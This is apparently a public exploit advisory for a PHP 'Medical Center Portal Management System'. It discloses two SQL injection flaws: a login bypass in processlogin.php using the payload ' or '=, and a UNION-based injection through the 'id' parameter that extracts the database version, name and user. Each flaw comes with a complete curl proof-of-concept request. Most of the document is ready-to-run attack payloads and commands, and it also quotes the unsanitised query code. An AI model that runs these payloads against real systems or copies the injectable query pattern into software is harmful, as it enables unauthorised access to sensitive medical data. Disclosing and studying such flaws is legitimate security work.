Medical Center Portal Management System SQL Injection

`# Exploit Title: Medical Center Portal Management System - SQL Injection(s)  
# Date: 2020-11-16  
# Exploit Author: gh1mau   
# Email: [email protected]  
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/  
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi  
# Software Release Data: November 16, 2020  
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)  
  
  
1. Authentication Bypass  
  
Vulnerable File:  
----------------   
/pages/processlogin.php  
  
Vulnerable Code:  
-----------------  
Entry point: (User input is not filtered)  
line 8: $users = trim($_POST['user']);  
line 9: $upass = trim($_POST['password']);  
  
Exit point:  
line 28: $result = $db->query($sql);  
  
Vulnerable Issue:  
-----------------  
Attacker could bypass the authentication using simple sqli login bypass payload  
  
username: gh1mau' or '=  
password: gh1mau' or '=  
  
  
POC:  
----  
curl -i -s -k --location --request POST 'http://localhost:88/medic/pages/processlogin.php' \  
--header 'Origin: http://localhost' \  
--header 'Cookie: PHPSESSID=3ijdjbcvocp1qmoi0kbfomhbr5' \  
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \  
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' \  
--header 'Referer: http://localhost:88/medic/pages/login.php' \  
--header 'Connection: close' \  
--header 'Sec-Fetch-Site: same-origin' \  
--header 'Sec-Fetch-Dest: document' \  
--header 'Host: localhost:88' \  
--header 'Accept-Encoding: gzip, deflate' \  
--header 'Sec-Fetch-Mode: navigate' \  
--header 'Cache-Control: max-age=0' \  
--header 'Upgrade-Insecure-Requests: 1' \  
--header 'Sec-Fetch-User: ?1' \  
--header 'Accept-Language: en-US,en;q=0.9' \  
--header 'Content-Length: 63' \  
--header 'Content-Type: application/x-www-form-urlencoded' \  
--data-raw 'user=gh1mau%27+or+%27%3D&password=gh1mau%27+or+%27%3D&btnlogin='  
  
  
2. SQL Injection in 'id' parameter  
  
Vulnerable File:  
----------------   
/pages/cust_searchfrm.php  
  
Vulnerable Code:  
-----------------  
Entry point: (User input is not filtered)  
line 25: $query = 'SELECT * FROM customer1 WHERE EMPLOYEE_ID ='.$_GET['id'];  
  
Exit point:  
line 26: $result = mysqli_query($db, $query) or die(mysqli_error($db));  
  
Vulnerable Issue:  
-----------------  
Authenticated Attacker could inject SQLi payloads through the 'id' parameter. Other files are als affected with the same issue  
  
Payload:  
--------  
UNION+ALL+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--+-  
  
POC:  
----  
curl -i -s -k --location --request GET 'http://localhost/medic/pages/us_searchfrm.php?action=edit%20&%20id=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--+-' \  
--header 'Cookie: PHPSESSID=3ijdjbcvocp1qmoi0kbfomhbr5' \  
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \  
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' \  
--header 'Connection: close' \  
--header 'Sec-Fetch-Site: none' \  
--header 'Sec-Fetch-Dest: document' \  
--header 'Host: localhost:88' \  
--header 'Accept-Encoding: gzip, deflate' \  
--header 'Sec-Fetch-Mode: navigate' \  
--header 'Cache-Control: max-age=0' \  
--header 'Upgrade-Insecure-Requests: 1' \  
--header 'Sec-Fetch-User: ?1' \  
--header 'Accept-Language: en-US,en;q=0.9' \  
--data-raw ''  
`